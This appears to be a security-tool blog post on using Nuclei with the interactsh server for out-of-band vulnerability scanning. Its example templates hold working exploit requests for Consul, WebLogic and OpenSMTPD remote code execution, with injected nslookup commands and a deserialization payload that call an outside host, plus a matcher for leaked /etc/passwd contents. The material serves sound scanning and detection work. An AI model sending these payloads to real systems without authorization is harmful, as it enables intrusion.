Blog
-

4 min read

Nuclei + Interactsh Integration for Automating OOB Testing

Nuclei & Templates
Nuclei + Interactsh Integration for Automating OOB Testing

Authors

Ice3man
Ice3man

Share

We released interactsh, a server that can emulate a DNS, HTTP, HTTPS and SMTP server, allowing users to test for Out of Band Security vulnerabilities.

Nuclei v2.3.6 now supports using the interact.sh API to achieve OOB based vulnerability scanning with automatic Request correlation built in. It's as easy as writing {{interactsh-url}} anywhere in the request, and adding a matcher for interact_protocol. Nuclei will handle correlation of the interaction to the template & the request it was generated from allowing effortless OOB scanning.

How it works?

Nuclei engine checks the presence of matchers for interact_protocol and if detected, interactsh support is enabled for the request. What this means is the request will be checked for {{interactsh-url}} placeholders, and if detected they will be replaced on the fly with a random interact.sh url and polled by nuclei continuously for interactions.

The support is enabled in such a way that only a single poll request is necessary to get all the interactions for any number of unique URLs generated per session of nuclei. Internally, nuclei maintains an LRU cache of all the requests, with a max limit that can be tuned with -interactions-cache-size flag. By default, this value is set to 5000 requests with requests getting evicted every 60 seconds. Nuclei polls for interactions every 5 seconds.

You can also use self-hosted interactsh server with nuclei by passing self-hosted url using interactsh-url flag, as default it uses https://interact.sh

Placeholder Support

{{interactsh-url}} placeholder is supported in http and network requests.

An example of nuclei request with {{interactsh-url}} placeholders is provided below. These are replaced on runtime with unique interact.sh URLs.

yaml

1
- raw:
2
      - |
3
        GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
4
        Host: {{Hostname}}

Matching for Interactions

Matching is very easy with interactsh nuclei integration. Just add a standard nuclei word, regex or dsl matcher/extractor with parts that can be -

  1. interactsh_protocol - Value can be dns, http or smtp. This is the standard matcher for every interactsh based template with dns often as the common value as it is very non-intrusive in nature.
  2. interactsh_request - The request that the interact.sh server recieved.
  3. interactsh_response - The response that the interact.sh server sent to the client.

yaml

1
matchers:
2
      - type: word
3
        part: interactsh_protocol # Confirms the DNS Interaction
4
        words:
5
          - "dns"

These interactsh specific matchers can be combined with matchers on the parts of the request such as body, raw with matchers-condition: and to achieve precise scanning.

yaml

1
matchers-condition: and
2
matchers:
3
    - type: word
4
      part: interactsh_protocol # Confirms the DNS Interaction
5
      words:
6
        - "dns"
7


8
    - type: regex
9
      part: interactsh_request # Confirms the retrieval of etc/passwd file
10
      regex:
11
        - "root:[x*]:0:0:"
12


13
      - type: status
14
        status:
15
          - 200

Some Examples

The below template is an example demonstration of the OOB capabilities of nuclei. It detects hashicorp consul Services API RCE with interact.sh OOB server.

yaml

1
id: hashicorp-consul-rce
2


3
info:
4
  name: Hashicorp Consul Services Api RCE
5
  author: pikpikcu
6
  severity: critical
7
  reference: https://www.exploit-db.com/exploits/46074
8
  tags: hashicorp,rce,oob
9


10
requests:
11
  - raw:
12
      - | # Create USER
13
        PUT /v1/agent/service/register HTTP/1.1
14
        Host: {{Hostname}}
15
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
16
        Connection: close
17
        Upgrade-Insecure-Requests: 1
18
        Content-Length: 205
19
        
20
        {
21
          "ID": "{{randstr}}",
22
          "Name": "{{randstr}}",
23
          "Address": "127.0.0.1",
24
          "Port": 80,
25
          "check": {
26
            "script": "nslookup {{interactsh-url}}",
27
            "interval": "10s",
28
            "Timeout": "86400s"
29
          }
30
        }
31
    matchers:
32
      - type: word
33
        part: interactsh_protocol # Confirms the DNS Interaction
34
        words:
35
          - "dns"

The below template detects Weblogic RCE by deserialization using interact.sh OOB server of nuclei.

yaml

1
id: CVE-2017-3506
2


3
info:
4
  name: Oracle Weblogic Remote OS Command Execution
5
  author: pdteam
6
  description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
7
  severity: high
8
  tags: cve,cve2017,weblogic,oracle,rce,oob
9
  reference: |
10
      - https://hackerone.com/reports/810778
11
      - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
12
requests:
13
  - raw:
14
      - |
15
        POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
16
        Host: {{Hostname}}
17
        Content-Type: text/xml
18
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
19
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
20
        Content-Type: text/xml;charset=UTF-8
21
        Content-Length: 873
22
        
23
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
24
          <soapenv:Header>
25
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
26
              <java version="1.8" class="java.beans.XMLDecoder">
27
                <void id="url" class="java.net.URL">
28
                  <string>http://{{interactsh-url}}</string>
29
                </void>
30
                <void idref="url">
31
                  <void id="stream" method ="openStream"/>
32
                </void>
33
              </java>
34
            </work:WorkContext>
35
            </soapenv:Header>
36
          <soapenv:Body/>
37
        </soapenv:Envelope>
38
    matchers:
39
      - type: word
40
        part: interactsh_protocol # Confirms the DNS Interaction
41
        words:
42
          - "dns"

A network template for OpenSTMPd that detects RCE by OOB request is also given below.

yaml

1
id: CVE-2020-7247
2
info:
3
  name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
4
  author: princechaddha
5
  severity: critical
6
  reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
7
  tags: cve,cve2020,smtp,opensmtpd,network,rce
8


9
network:
10
  - inputs:
11
      - read: 1024
12
      - data: "helo target\r\n"
13
        read: 1024
14
      - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n"
15
        read: 1024
16
      - data: "RCPT TO:<root>\r\n"
17
        read: 1024
18
      - data: "DATA\r\n"
19
        read: 1024
20
      - data: "\r\nxxxx\r\n.\r\n"
21
        read: 1024
22
      - data: "QUIT\r\n"
23
        read: 1024
24
    host:
25
      - "{{Hostname}}:25"
26


27
    matchers-condition: and
28
    matchers:
29
      - type: word
30
        part: interactsh_protocol
31
        words:
32
          - "dns"
33


34
      - type: word
35
        part: raw
36
        words:
37
          - "Message accepted for delivery"

Got questions about Interactsh or nuclei integration? Feel free to tweet us at @pdnuclei or jump in our discord server to discuss more security and automation.